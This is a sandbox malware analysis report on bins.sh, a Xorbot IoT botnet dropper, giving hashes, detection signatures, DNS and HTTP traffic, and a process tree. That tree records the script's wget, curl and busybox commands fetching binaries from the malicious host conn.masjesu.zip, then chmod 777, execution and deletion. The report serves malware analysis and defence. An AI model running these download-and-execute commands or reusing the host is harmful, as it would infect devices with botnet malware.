Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

3

bins.sh

debian-9-armhf

4

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    138s
  • max time network
    147s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240418-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    05/01/2025, 16:50 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    e4f7c4a0fc9b3693b98dd8a72fd33c6c

  • SHA1

    02b5a992865ee73db4aa7f47d76847017ed9bef8

  • SHA256

    c063bdd7c8bb3a71082fd8295be7980b06d75b9fea1efbd02684a2a4dff87397

  • SHA512

    033e72887a61c5b6f214acdd88d420cabe9b673b8f239ac5093c17d861c313167840c19e65b07bdb6b69b9a25e1cc58d577e76d6dc4e4f3d2df38ec298ff473d

  • SSDEEP

    96:Yj/p8AKhThvhQDDcwLk/kTkvm+qLfrnf/fyJptLCalhvhDhm3v6qi3EIuMZ7XeU1:w1zr3yJptWTc8QbWGvSr3yJpX8QbWGd

Score
10/10
xorbotbotnetdefense_evasiondiscoverytrojan

Malware Config

Signatures

  • Detects Xorbot 2 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 5 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:729
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:733
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:738
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:756
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:759
        • /bin/chmod
          chmod 777 fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          2⤵
          • File and Directory Permissions Modification
          PID:760
        • /tmp/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          ./fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          2⤵
          • Executes dropped EXE
          PID:761
        • /bin/rm
          rm fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          2⤵
            PID:763
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:764
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv
            2⤵
            • Reads runtime system information
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:843
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv
            2⤵
            • System Network Configuration Discovery
            PID:845

        Network

        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN A
          Response
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN AAAA
          Response
          conn.masjesu.zip
          IN A
          66.63.187.225
          conn.masjesu.zip
          IN A
          146.19.162.73
        • flag-us
          GET
          http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          Remote address:
          66.63.187.225:80
          Request
          GET /bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD HTTP/1.1
          User-Agent: Wget/1.18 (linux-gnu)
          Accept: */*
          Accept-Encoding: identity
          Host: conn.masjesu.zip
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Sun, 05 Jan 2025 16:50:33 GMT
          Content-Type: application/octet-stream
          Content-Length: 101654
          Connection: keep-alive
          Last-Modified: Sun, 05 Jan 2025 16:00:01 GMT
          ETag: "677aac81-18d16"
          X-Cache-Status: HIT
          Accept-Ranges: bytes
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN A
          Response
          conn.masjesu.zip
          IN A
          66.63.187.225
          conn.masjesu.zip
          IN A
          146.19.162.73
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN AAAA
          Response
        • flag-us
          GET
          http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          Remote address:
          66.63.187.225:80
          Request
          GET /bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD HTTP/1.1
          Host: conn.masjesu.zip
          User-Agent: curl/7.52.1
          Accept: */*
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Sun, 05 Jan 2025 16:50:34 GMT
          Content-Type: application/octet-stream
          Content-Length: 101654
          Connection: keep-alive
          Last-Modified: Sun, 05 Jan 2025 16:00:01 GMT
          ETag: "677aac81-18d16"
          X-Cache-Status: HIT
          Accept-Ranges: bytes
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN A
          Response
          conn.masjesu.zip
          IN A
          66.63.187.225
          conn.masjesu.zip
          IN A
          146.19.162.73
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN AAAA
          Response
        • flag-us
          GET
          http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          Remote address:
          66.63.187.225:80
          Request
          GET /bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD HTTP/1.1
          Host: conn.masjesu.zip
          User-Agent: Wget
          Connection: close
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Sun, 05 Jan 2025 16:50:35 GMT
          Content-Type: application/octet-stream
          Content-Length: 101654
          Connection: close
          Last-Modified: Sun, 05 Jan 2025 16:00:01 GMT
          ETag: "677aac81-18d16"
          X-Cache-Status: HIT
          Accept-Ranges: bytes
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN A
          Response
          conn.masjesu.zip
          IN A
          146.19.162.73
          conn.masjesu.zip
          IN A
          66.63.187.225
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN AAAA
          Response
        • flag-us
          GET
          http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv
          Remote address:
          66.63.187.225:80
          Request
          GET /bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv HTTP/1.1
          User-Agent: Wget/1.18 (linux-gnu)
          Accept: */*
          Accept-Encoding: identity
          Host: conn.masjesu.zip
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Sun, 05 Jan 2025 16:52:48 GMT
          Content-Type: application/octet-stream
          Content-Length: 101142
          Connection: keep-alive
          Last-Modified: Sun, 05 Jan 2025 16:00:02 GMT
          ETag: "677aac82-18b16"
          X-Cache-Status: HIT
          Accept-Ranges: bytes
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN A
          Response
          conn.masjesu.zip
          IN A
          66.63.187.225
          conn.masjesu.zip
          IN A
          146.19.162.73
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN AAAA
          Response
        • flag-us
          GET
          http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv
          Remote address:
          66.63.187.225:80
          Request
          GET /bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv HTTP/1.1
          Host: conn.masjesu.zip
          User-Agent: curl/7.52.1
          Accept: */*
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Sun, 05 Jan 2025 16:52:49 GMT
          Content-Type: application/octet-stream
          Content-Length: 101142
          Connection: keep-alive
          Last-Modified: Sun, 05 Jan 2025 16:00:02 GMT
          ETag: "677aac82-18b16"
          X-Cache-Status: HIT
          Accept-Ranges: bytes
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN A
          Response
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN AAAA
          Response
          conn.masjesu.zip
          IN A
          146.19.162.73
          conn.masjesu.zip
          IN A
          66.63.187.225
        • 66.63.187.225:80
          http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          http
          2.8kB
           106.1kB
           51
          79

          HTTP Request

          GET http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD

          HTTP Response

          200
        • 66.63.187.225:80
          http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          http
          2.8kB
           106.1kB
           52
          79

          HTTP Request

          GET http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD

          HTTP Response

          200
        • 66.63.187.225:80
          http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          http
          1.2kB
           42.0kB
           22
          32

          HTTP Request

          GET http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD

          HTTP Response

          200
        • 146.19.162.73:80
          conn.masjesu.zip
          420 B
           7
        • 66.63.187.225:80
          http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv
          http
          2.6kB
           105.5kB
           47
          79

          HTTP Request

          GET http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv

          HTTP Response

          200
        • 66.63.187.225:80
          http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv
          http
          2.9kB
           105.5kB
           53
          79

          HTTP Request

          GET http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv

          HTTP Response

          200
        • 146.19.162.73:80
          conn.masjesu.zip
          240 B
           4
        • 1.1.1.1:53
          conn.masjesu.zip
          dns
          124 B
           219 B
           2
          2

          DNS Request

          conn.masjesu.zip

          DNS Request

          conn.masjesu.zip

          DNS Response

          66.63.187.225
          146.19.162.73

        • 1.1.1.1:53
          conn.masjesu.zip
          dns
          124 B
           219 B
           2
          2

          DNS Request

          conn.masjesu.zip

          DNS Request

          conn.masjesu.zip

          DNS Response

          66.63.187.225
          146.19.162.73

        • 1.1.1.1:53
          conn.masjesu.zip
          dns
          124 B
           219 B
           2
          2

          DNS Request

          conn.masjesu.zip

          DNS Request

          conn.masjesu.zip

          DNS Response

          66.63.187.225
          146.19.162.73

        • 1.1.1.1:53
          conn.masjesu.zip
          dns
          124 B
           219 B
           2
          2

          DNS Request

          conn.masjesu.zip

          DNS Request

          conn.masjesu.zip

          DNS Response

          146.19.162.73
          66.63.187.225

        • 1.1.1.1:53
          conn.masjesu.zip
          dns
          124 B
           219 B
           2
          2

          DNS Request

          conn.masjesu.zip

          DNS Request

          conn.masjesu.zip

          DNS Response

          66.63.187.225
          146.19.162.73

        • 1.1.1.1:53
          conn.masjesu.zip
          dns
          124 B
           219 B
           2
          2

          DNS Request

          conn.masjesu.zip

          DNS Request

          conn.masjesu.zip

          DNS Response

          146.19.162.73
          66.63.187.225

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          Filesize

          99KB

          MD5

          9438d9bc392bcf300a5583b6df5bc8f6

          SHA1

          375a6ae34b516f6f3eeea8030c4084f585017efa

          SHA256

          68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

          SHA512

          1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

          Download Submit

        • /tmp/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv
          Filesize

          98KB

          MD5

          5141342d0df8699fa32a6b066a0c592e

          SHA1

          8157673225bd5182f16215e2aa823a25ca2d4fbc

          SHA256

          54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

          SHA512

          d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

          Download Submit

        We care about your privacy.

        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.